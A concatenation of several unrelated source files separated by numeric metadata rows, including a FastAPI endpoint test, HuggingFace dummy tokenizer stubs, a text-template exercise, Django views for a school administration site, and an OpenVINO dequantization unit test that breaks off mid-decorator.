"https://test-idafd.biodiversity.org.au/name/afd/70468229",
"https://test-idafd.biodiversity.org.au/name/afd/70496191",
]
| 63.777778
| 73
| 0.719164
| 4,441
| 31,570
| 5.111236
| 0.11619
| 0.194678
| 0.302833
| 0.562404
| 0.821975
| 0.821975
| 0.821975
| 0.821975
| 0
| 0
| 0
| 0.134964
| 0.078112
| 31,570
| 495
| 74
| 63.777778
| 0.644963
| 0.003516
| 0
| 0
| 0
| 0
| 0.874082
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6f66d39509b2371343f234d5244ff58766540af6
| 2,112
|
py
|
Python
|
tests/test_app.py
|
postadress/robotframework-webservice
|
2fc112b3b4bd7493c6c8cb1e00655b24e20bd1e5
|
[
"Apache-2.0"
] | 5
|
2021-07-04T13:37:02.000Z
|
2021-09-22T15:56:57.000Z
|
tests/test_app.py
|
postadress/robotframework-webservice
|
2fc112b3b4bd7493c6c8cb1e00655b24e20bd1e5
|
[
"Apache-2.0"
] | null | null | null |
tests/test_app.py
|
postadress/robotframework-webservice
|
2fc112b3b4bd7493c6c8cb1e00655b24e20bd1e5
|
[
"Apache-2.0"
] | 1
|
2021-09-07T07:37:30.000Z
|
2021-09-07T07:37:30.000Z
|
from fastapi.testclient import TestClient
import unittest
from RobotFrameworkService.main import app
class EndpointTesttest_s(unittest.TestCase):
def test_is_service_available(self):
with TestClient(app) as client:
response = client.get("/status")
self.assertEqual(200, response.status_code)
def test_is_robottask_startable(self):
with TestClient(app) as client:
response = client.get("/robotframework/run/anotherTask")
self.assertEqual(200, response.status_code)
def test_is_robottask_available_with_logs(self):
with TestClient(app) as client:
response = client.get("/robotframework/run_and_show/anotherTask")
self.assertEqual(200, response.status_code)
def test_is_robottask_available_with_reports(self):
with TestClient(app) as client:
response = client.get("/robotframework/run_and_show_report/anotherTask")
self.assertEqual(200, response.status_code)
def test_is_robottask_available_with_logs_and_arguments(self):
with TestClient(app) as client:
response = client.get("/robotframework/run_and_show/anotherTask?art=tests&description=EreichbarkeitsTestMitLogs")
self.assertEqual(200, response.status_code)
def test_is_robottask_available_with_reports_and_arguments(self):
with TestClient(app) as client:
response = client.get("/robotframework/run_and_show_report/anotherTask?art=tests&description=FunktionsTestMitReports")
self.assertEqual(200, response.status_code)
def test_is_robotlog_available(self):
with TestClient(app) as client:
client.get("/robotframework/run/anotherTask")
response = client.get("/robotframework/show_log/anotherTask")
self.assertEqual(200, response.status_code)
def test_is_robotreport_available(self):
with TestClient(app) as client:
client.get("/robotframework/run/anotherTask")
response = client.get("/robotframework/show_report/anotherTask")
self.assertEqual(200, response.status_code)
| 41.411765
| 130
| 0.724432
| 241
| 2,112
| 6.112033
| 0.190871
| 0.0611
| 0.14053
| 0.114053
| 0.819416
| 0.819416
| 0.819416
| 0.813306
| 0.813306
| 0.715547
| 0
| 0.01397
| 0.186553
| 2,112
| 50
| 131
| 42.24
| 0.843423
| 0
| 0
| 0.473684
| 0
| 0
| 0.209953
| 0.206635
| 0
| 0
| 0
| 0
| 0.210526
| 1
| 0.210526
| false
| 0
| 0.078947
| 0
| 0.315789
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
488dc8928c219190e5b4dfbc67d7445b8b3c9373
| 8,007
|
py
|
Python
|
src/transformers/utils/dummy_tokenizers_objects.py
|
Yokohide0317/transformers
|
1089c30a4a3c56dcf017e500ba4b44e5c39f68dd
|
[
"Apache-2.0"
] | 1
|
2022-01-22T14:31:15.000Z
|
2022-01-22T14:31:15.000Z
|
src/transformers/utils/dummy_tokenizers_objects.py
|
Yokohide0317/transformers
|
1089c30a4a3c56dcf017e500ba4b44e5c39f68dd
|
[
"Apache-2.0"
] | null | null | null |
src/transformers/utils/dummy_tokenizers_objects.py
|
Yokohide0317/transformers
|
1089c30a4a3c56dcf017e500ba4b44e5c39f68dd
|
[
"Apache-2.0"
] | null | null | null |
# This file is autogenerated by the command `make fix-copies`, do not edit.
# flake8: noqa
from ..file_utils import DummyObject, requires_backends
class AlbertTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class BartTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class BarthezTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class BertTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class BigBirdTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class BlenderbotTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class BlenderbotSmallTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class CamembertTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class CLIPTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class ConvBertTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class DebertaTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class DistilBertTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class DPRContextEncoderTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class DPRQuestionEncoderTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class DPRReaderTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class ElectraTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class FNetTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class FunnelTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class GPT2TokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class HerbertTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class LayoutLMTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class LayoutLMv2TokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class LayoutXLMTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class LEDTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class LongformerTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class LxmertTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class MBartTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class MBart50TokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class MobileBertTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class MPNetTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class MT5TokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class OpenAIGPTTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class PegasusTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class RealmTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class ReformerTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class RemBertTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class RetriBertTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class RobertaTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class RoFormerTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class SplinterTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class SqueezeBertTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class T5TokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class XLMRobertaTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class XLNetTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
class PreTrainedTokenizerFast(metaclass=DummyObject):
_backends = ["tokenizers"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["tokenizers"])
| 25.100313
| 75
| 0.692519
| 697
| 8,007
| 7.56528
| 0.106169
| 0.139579
| 0.238953
| 0.324294
| 0.801252
| 0.801252
| 0.801252
| 0.801252
| 0.801252
| 0.801252
| 0
| 0.001055
| 0.171225
| 8,007
| 318
| 76
| 25.179245
| 0.79355
| 0.010741
| 0
| 0.745856
| 1
| 0
| 0.113665
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.248619
| false
| 0
| 0.005525
| 0
| 0.751381
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 12
|
48980b32d470be8627222c14e21285de3040220d
| 922
|
py
|
Python
|
Ch_7_Mangle Data Like a Pro/7_5.py
|
brianchiang-tw/Introducing_Python
|
557fcddb6329741a177d6ee1d24122b36e106235
|
[
"MIT"
] | 1
|
2020-07-21T08:34:08.000Z
|
2020-07-21T08:34:08.000Z
|
Ch_7_Mangle Data Like a Pro/7_5.py
|
brianchiang-tw/Introducing_Python
|
557fcddb6329741a177d6ee1d24122b36e106235
|
[
"MIT"
] | null | null | null |
Ch_7_Mangle Data Like a Pro/7_5.py
|
brianchiang-tw/Introducing_Python
|
557fcddb6329741a177d6ee1d24122b36e106235
|
[
"MIT"
] | null | null | null |
email_template = \
'''
Dear {salutation} {name},
Thank you for your letter. We are sorry that our {product} {verbed} in your
{room}. Please note that it should never be used in a {room}, especially
near any {animals}.
Send us your receipt and {amount} for shipping and handling. We will send
you another {product} that, in our test, is {percent}% less likely to
have {verbed}.
Thank your for your support
Sincerely,
{spokesman}
{job_title}
'''
# expected output:
'''
Dear {salutation} {name},
Thank you for your letter. We are sorry that our {product} {verbed} in your
{room}. Please note that it should never be used in a {room}, especially
near any {animals}.
Send us your receipt and {amount} for shipping and handling. We will send
you another {product} that, in our test, is {percent}% less likely to
have {verbed}.
Thank your for your support
Sincerely,
{spokesman}
{job_title}
'''
print( email_template )
| 23.641026
| 75
| 0.727766
| 145
| 922
| 4.6
| 0.37931
| 0.041979
| 0.053973
| 0.068966
| 0.932534
| 0.932534
| 0.932534
| 0.932534
| 0.932534
| 0.932534
| 0
| 0
| 0.172451
| 922
| 39
| 76
| 23.641026
| 0.874181
| 0.017354
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
48eb518fdbe52c19ba8aa4fe22070f64828c14b1
| 8,851
|
py
|
Python
|
basicInfo/views.py
|
laylalaisy/Educational-Administration-System
|
1d30775cb429e6a3d7e0aff0934b38418bac6fba
|
[
"Apache-2.0"
] | 4
|
2018-07-13T04:01:09.000Z
|
2022-03-26T06:53:03.000Z
|
basicInfo/views.py
|
laylalaisy/Educational-Administration-System
|
1d30775cb429e6a3d7e0aff0934b38418bac6fba
|
[
"Apache-2.0"
] | null | null | null |
basicInfo/views.py
|
laylalaisy/Educational-Administration-System
|
1d30775cb429e6a3d7e0aff0934b38418bac6fba
|
[
"Apache-2.0"
] | 2
|
2018-07-23T14:40:28.000Z
|
2018-09-19T03:39:23.000Z
|
from django.shortcuts import render
from django.http import HttpResponseForbidden
# Create your views here.
def default(request):
return render(request, 'basicInfo/basic_homepage.html', {})
def signup(request):
return render(request, "basicInfo/basic_signup.html", {})
def login(request):
return render(request, "basicInfo/basic_login.html", {})
def student(request):
sid = request.session["account_id"]
feedDict={
"account_id": sid
}
if request.session["type"]!=0:
return HttpResponseForbidden()
return render(request, "basicInfo/student_personinfo.html", feedDict)
def exam(request):
sid = request.session["account_id"]
feedDict={
"account_id": sid
}
if request.session["type"]!=0:
return HttpResponseForbidden()
return render(request, "basicInfo/student_examarrange.html", feedDict)
def calendar(request):
sid = request.session["account_id"]
feedDict={
"account_id": sid
}
if request.session["type"]!=0:
return HttpResponseForbidden()
return render(request, "basicInfo/student_calender.html", feedDict)
def courseplan(request):
sid = request.session["account_id"]
feedDict={
"account_id": sid
}
if request.session["type"]!=0:
return HttpResponseForbidden()
return render(request, "basicInfo/student_courseplan.html", feedDict)
def personalinfo(request):
sid = request.session["account_id"]
feedDict={
"account_id": sid
}
if request.session["type"]!=0:
return HttpResponseForbidden()
return render(request, "basicInfo/student_personinfo.html", feedDict)
def courseregist(request):
sid = request.session["account_id"]
feedDict={
"account_id": sid
}
if request.session["type"]!=0:
return HttpResponseForbidden()
return render(request, "basicInfo/student_courseregist.html", feedDict)
def mycourse(request):
sid = request.session["account_id"]
feedDict={
"account_id": sid
}
if request.session["type"]!=0:
return HttpResponseForbidden()
return render(request, "basicInfo/student_mycourse.html", feedDict)
def grade(request):
sid = request.session["account_id"]
feedDict={
"account_id": sid
}
if request.session["type"]!=0:
return HttpResponseForbidden()
return render(request, "basicInfo/student_grade.html", feedDict)
def coursesearch(request):
sid = request.session["account_id"]
feedDict={
"account_id": sid
}
if request.session["type"]!=0:
return HttpResponseForbidden()
return render(request, "basicInfo/student_coursesearch.html", feedDict)
def teacher(request):
tid = request.session["account_id"]
feedDict={
"account_id": tid
}
if request.session["type"]!=1:
return HttpResponseForbidden()
return render(request, "basicInfo/teacher_information.html", feedDict)
def teacher_index(request):
tid = request.session["account_id"]
feedDict={
"account_id": tid
}
if request.session["type"]!=1:
return HttpResponseForbidden()
return render(request, "basicInfo/teacher_information.html", feedDict)
def teacher_information(request):
tid = request.session["account_id"]
feedDict={
"account_id": tid
}
if request.session["type"]!=1:
return HttpResponseForbidden()
return render(request, "basicInfo/teacher_information.html", feedDict)
def teacher_comment(request):
tid = request.session["account_id"]
feedDict={
"account_id": tid
}
if request.session["type"]!=1:
return HttpResponseForbidden()
return render(request, "basicInfo/teacher_comment.html", feedDict)
def teacher_course_regist(request):
tid = request.session["account_id"]
feedDict={
"account_id": tid
}
if request.session["type"]!=1:
return HttpResponseForbidden()
return render(request, "basicInfo/teacher_course_regist.html", feedDict)
def teacher_course_open(request):
tid = request.session["account_id"]
feedDict={
"account_id": tid
}
if request.session["type"]!=1:
return HttpResponseForbidden()
return render(request, "basicInfo/teacher_course_open.html", feedDict)
def teacher_course_edit(request):
tid = request.session["account_id"]
feedDict={
"account_id": tid
}
if request.session["type"]!=1:
return HttpResponseForbidden()
return render(request, "basicInfo/teacher_course_edit.html", feedDict)
def school_forum(request):
tid = request.session["account_id"]
feedDict={
"account_id": tid
}
return render(request, "basicInfo/school_forum.html", feedDict)
def admin(request):
tid = request.session["account_id"]
feedDict={
"account_id": tid
}
if request.session["type"]!=2:
return HttpResponseForbidden()
return render(request, "basicInfo/admin_information.html", feedDict)
def admin_index(request):
tid = request.session["account_id"]
feedDict={
"account_id": tid
}
if request.session["type"]!=2:
return HttpResponseForbidden()
return render(request, "basicInfo/admin_information.html", feedDict)
def admin_information(request):
tid = request.session["account_id"]
feedDict={
"account_id": tid
}
if request.session["type"]!=2:
return HttpResponseForbidden()
return render(request, "basicInfo/admin_information.html", feedDict)
def admin_comment(request):
tid = request.session["account_id"]
feedDict={
"account_id": tid
}
if request.session["type"]!=2:
return HttpResponseForbidden()
return render(request, "basicInfo/admin_comment.html", feedDict)
def admin_course_regist(request):
tid = request.session["account_id"]
feedDict={
"account_id": tid
}
if request.session["type"]!=2:
return HttpResponseForbidden()
return render(request, "basicInfo/admin_course_regist.html", feedDict)
def admin_course_open(request):
tid = request.session["account_id"]
feedDict={
"account_id": tid
}
if request.session["type"]!=2:
return HttpResponseForbidden()
return render(request, "basicInfo/admin_course_open.html", feedDict)
def admin_course_edit(request):
tid = request.session["account_id"]
feedDict={
"account_id": tid
}
if request.session["type"]!=2:
return HttpResponseForbidden()
return render(request, "basicInfo/admin_course_edit.html", feedDict)
def admin_course_approve(request):
tid = request.session["account_id"]
feedDict={
"account_id": tid
}
if request.session["type"]!=2:
return HttpResponseForbidden()
return render(request, "basicInfo/admin_course_approve.html", feedDict)
def admin_teach_approve(request):
tid = request.session["account_id"]
feedDict={
"account_id": tid
}
if request.session["type"]!=2:
return HttpResponseForbidden()
return render(request, "basicInfo/admin_teach_approve.html", feedDict)
def admin_course_adjust(request):
tid = request.session["account_id"]
feedDict={
"account_id": tid
}
if request.session["type"]!=2:
return HttpResponseForbidden()
return render(request, "basicInfo/admin_course_adjust.html", feedDict)
def admin_teach_adjust(request):
tid = request.session["account_id"]
feedDict={
"account_id": tid
}
if request.session["type"]!=2:
return HttpResponseForbidden()
return render(request, "basicInfo/admin_teach_adjust.html", feedDict)
def admin_apply_approve_s(request):
tid = request.session["account_id"]
feedDict={
"account_id": tid
}
if request.session["type"]!=2:
return HttpResponseForbidden()
return render(request, "basicInfo/admin_apply_approve_s.html", feedDict)
def admin_apply_approve_t(request):
tid = request.session["account_id"]
feedDict={
"account_id": tid
}
if request.session["type"]!=2:
return HttpResponseForbidden()
return render(request, "basicInfo/admin_apply_approve_t.html", feedDict)
def admin_select_adjust(request):
tid = request.session["account_id"]
feedDict={
"account_id": tid
}
if request.session["type"]!=2:
return HttpResponseForbidden()
return render(request, "basicInfo/admin_select_adjust.html", feedDict)
| 27.746082
| 77
| 0.648966
| 924
| 8,851
| 6.058442
| 0.0671
| 0.099678
| 0.115398
| 0.170061
| 0.902465
| 0.849411
| 0.816542
| 0.816542
| 0.816542
| 0.816542
| 0
| 0.004412
| 0.231725
| 8,851
| 318
| 78
| 27.833333
| 0.818824
| 0.002599
| 0
| 0.633858
| 0
| 0
| 0.216578
| 0.129571
| 0
| 0
| 0
| 0
| 0
| 1
| 0.133858
| false
| 0
| 0.007874
| 0.011811
| 0.393701
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5b1b2ef8471154fb644a358da996c6e20c168c70
| 13,624
|
py
|
Python
|
tools/mo/unit_tests/mo/middle/dequantize_linear_resolver_test.py
|
pazamelin/openvino
|
b7e8ef910d7ed8e52326d14dc6fd53b71d16ed48
|
[
"Apache-2.0"
] | 1
|
2021-02-01T06:35:55.000Z
|
2021-02-01T06:35:55.000Z
|
tools/mo/unit_tests/mo/middle/dequantize_linear_resolver_test.py
|
pazamelin/openvino
|
b7e8ef910d7ed8e52326d14dc6fd53b71d16ed48
|
[
"Apache-2.0"
] | 58
|
2020-11-06T12:13:45.000Z
|
2022-03-28T13:20:11.000Z
|
tools/mo/unit_tests/mo/middle/dequantize_linear_resolver_test.py
|
pazamelin/openvino
|
b7e8ef910d7ed8e52326d14dc6fd53b71d16ed48
|
[
"Apache-2.0"
] | 2
|
2021-07-14T07:40:50.000Z
|
2021-07-27T01:40:03.000Z
|
# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import unittest
import numpy as np
from openvino.tools.mo.middle.dequantize_linear_resolver import DequantizeLinearResolver
from openvino.tools.mo.front.common.partial_infer.utils import int64_array
from openvino.tools.mo.utils.ir_engine.compare_graphs import compare_graphs
from unit_tests.utils.graph import build_graph
from generator import generator, generate
nodes1_attributes = {
'input': {'kind': 'op', 'op': 'AnyOp'},
'input_data': {'kind': 'data', 'shape': None},
'dequantize': {'kind': 'op', 'op': 'DequantizeLinear', 'axis': 1},
'dequantize_data': {'kind': 'data', 'shape': None},
'scale_param_dq': {'kind': 'op', 'type': 'Const', 'op': 'Const'},
'scale_param_dq_data': {'kind': 'data', 'shape': None},
'zerop_param_dq': {'kind': 'op', 'type': 'Const', 'op': 'Const'},
'zerop_param_dq_data': {'kind': 'data', 'shape': None},
'out': {'kind': 'op', 'op': 'AnyOp'},
'out_data': {'kind': 'data', 'shape': None},
'result': {'kind': 'op', 'op': 'Result'},
}
nodes_ref_attributes = {
'input': {'kind': 'op', 'op': 'AnyOp'},
'input_data': {'kind': 'data', 'shape': None},
'cast': {'kind': 'op', 'op': 'Cast', 'type': 'Convert'},
'cast_data': {'kind': 'data', 'shape': None},
'sub': {'kind': 'op', 'op': 'Sub', 'type': 'Subtract'},
'sub_data': {'kind': 'data', 'shape': None},
'mul': {'kind': 'op', 'op': 'Mul', 'type': 'Multiply'},
'mul_data': {'kind': 'data', 'shape': None},
'scale_param_dq': {'kind': 'op', 'type': 'Const', 'op': 'Const'},
'scale_param_dq_data': {'kind': 'data', 'shape': None},
'zerop_param_dq': {'kind': 'op', 'type': 'Const', 'op': 'Const'},
'zerop_param_dq_data': {'kind': 'data', 'shape': None},
'out': {'kind': 'op', 'op': 'AnyOp'},
'out_data': {'kind': 'data', 'shape': None},
'result': {'kind': 'op', 'op': 'Result'},
'sub_reshape_const': {'kind': 'op', 'type': 'Const', 'op': 'Const'},
'sub_reshape_const_data': {'kind': 'data', 'shape': None},
'sub_reshape': {'kind': 'op', 'type': 'Reshape', 'op': 'Reshape'},
'sub_reshape_data': {'kind': 'data', 'shape': None},
'mul_reshape_const': {'kind': 'op', 'type': 'Const', 'op': 'Const'},
'mul_reshape_const_data': {'kind': 'data', 'shape': None},
'mul_reshape': {'kind': 'op', 'type': 'Reshape', 'op': 'Reshape'},
'mul_reshape_data': {'kind': 'data', 'shape': None},
}
class TestDequantizeLinearResolver(unittest.TestCase):
def test_dequantize(self):
graph = build_graph(nodes1_attributes,
[('input', 'input_data'),
('input_data', 'dequantize'),
('dequantize', 'dequantize_data'),
('scale_param_dq', 'scale_param_dq_data'),
('zerop_param_dq', 'zerop_param_dq_data'),
('scale_param_dq_data', 'dequantize'),
('zerop_param_dq_data', 'dequantize'),
('dequantize_data', 'out'),
('out', 'out_data'),
('out_data', 'result'),
],
{'input_data': {'shape': int64_array([1, 3, 224, 224])},
'scale_param_dq': {'shape': np.array([]), 'value': np.float32(1.0 / 255)},
'scale_param_dq_data': {'shape': np.array([]), 'value': np.float32(1.0 / 255)},
'zerop_param_dq': {'shape': np.array([]), 'value': np.uint8(0)},
'zerop_param_dq_data': {'shape': np.array([]), 'value': np.uint8(0)},
}, nodes_with_edges_only=True)
graph_ref = build_graph(nodes_ref_attributes,
[('input', 'input_data'),
('input_data', 'cast'),
('cast', 'cast_data'),
('cast_data', 'sub'),
('zerop_param_dq', 'zerop_param_dq_data'),
('zerop_param_dq_data', 'sub'),
('sub', 'sub_data'),
('sub_data', 'mul'),
('scale_param_dq', 'scale_param_dq_data'),
('scale_param_dq_data', 'mul'),
('mul', 'mul_data'),
('mul_data', 'out'),
('out', 'out_data'),
('out_data', 'result'),
],
{'input_data': {'shape': int64_array([1, 3, 224, 224])},
'scale_param_dq': {'shape': np.array([]), 'value': np.float32(1.0 / 255)},
'scale_param_dq_data': {'shape': np.array([]), 'value': np.float32(1.0 / 255)},
'zerop_param_dq': {'shape': np.array([]), 'value': np.uint8(0)},
'zerop_param_dq_data': {'shape': np.array([]), 'value': np.uint8(0)},
}, nodes_with_edges_only=True)
graph.stage = 'middle'
DequantizeLinearResolver().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'out', check_op_attrs=True)
self.assertTrue(flag, resp)
def test_dequantize_no_zerop(self):
graph = build_graph(nodes1_attributes,
[('input', 'input_data'),
('input_data', 'dequantize'),
('dequantize', 'dequantize_data'),
('scale_param_dq', 'scale_param_dq_data'),
('scale_param_dq_data', 'dequantize'),
('dequantize', 'dequantize_data'),
('dequantize_data', 'out'),
('out', 'out_data'),
('out_data', 'result'),
],
{'input_data': {'shape': int64_array([1, 3, 224, 224])},
'scale_param_dq': {'shape': np.array([]), 'value': np.float32(1.0 / 255)},
'scale_param_dq_data': {'shape': np.array([]), 'value': np.float32(1.0 / 255)},
}, nodes_with_edges_only=True)
graph_ref = build_graph(nodes_ref_attributes,
[('input', 'input_data'),
('input_data', 'cast'),
('cast', 'cast_data'),
('cast_data', 'mul'),
('scale_param_dq', 'scale_param_dq_data'),
('scale_param_dq_data', 'mul'),
('mul', 'mul_data'),
('mul_data', 'out'),
('out', 'out_data'),
('out_data', 'result'),
],
{'input_data': {'shape': int64_array([1, 3, 224, 224])},
'scale_param_dq': {'shape': np.array([]), 'value': np.float32(1.0 / 255)},
'scale_param_dq_data': {'shape': np.array([]), 'value': np.float32(1.0 / 255)},
}, nodes_with_edges_only=True)
graph.stage = 'middle'
DequantizeLinearResolver().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'out', check_op_attrs=True)
self.assertTrue(flag, resp)
@generator
class TestDequantizeWithAxis(unittest.TestCase):
@generate(*[(int64_array([1, 3, 4, 4]), np.array([2, 3, 4, 5], dtype=np.float32),
np.array([2, 3, 4, 5], dtype=np.uint8), int64_array([1, 1, 4, 1]), 2),
(int64_array([1, 3, 4, 4]), int64_array([2, 3, 4, 5]),
np.array([2, 3, 4, 5], dtype=np.uint8), int64_array([1, 3, 1, 1]), 1),
(int64_array([2, 3, 4, 4]), int64_array([2, 3, 4, 5]),
np.array([2, 3, 4, 5], dtype=np.uint8), int64_array([2, 1, 1, 1]), 0),
(int64_array([1, 3, 4, 4]), int64_array([2, 3, 4, 5]),
np.array([2, 3, 4, 5], dtype=np.uint8), int64_array([1, 1, 4, 1]), -2),
(int64_array([1, 3, 4, 4]), int64_array([2, 3, 4, 5]),
np.array([2, 3, 4, 5], dtype=np.uint8), int64_array([1, 1, 1, 4]), -1),
(int64_array([1, 3, 4, 4]), int64_array([2, 3, 4, 5]),
np.array([2, 3, 4, 5], dtype=np.int32), int64_array([1, 1, 4, 1]), 2),
(int64_array([1, 3, 4, 4]), int64_array([2, 3, 4, 5]),
np.array([2, 3, 4, 5], dtype=np.int32), int64_array([1, 3, 1, 1]), 1),
(int64_array([2, 3, 4, 4]), int64_array([2, 3, 4, 5]),
np.array([2, 3, 4, 5], dtype=np.int32), int64_array([2, 1, 1, 1]), 0),
])
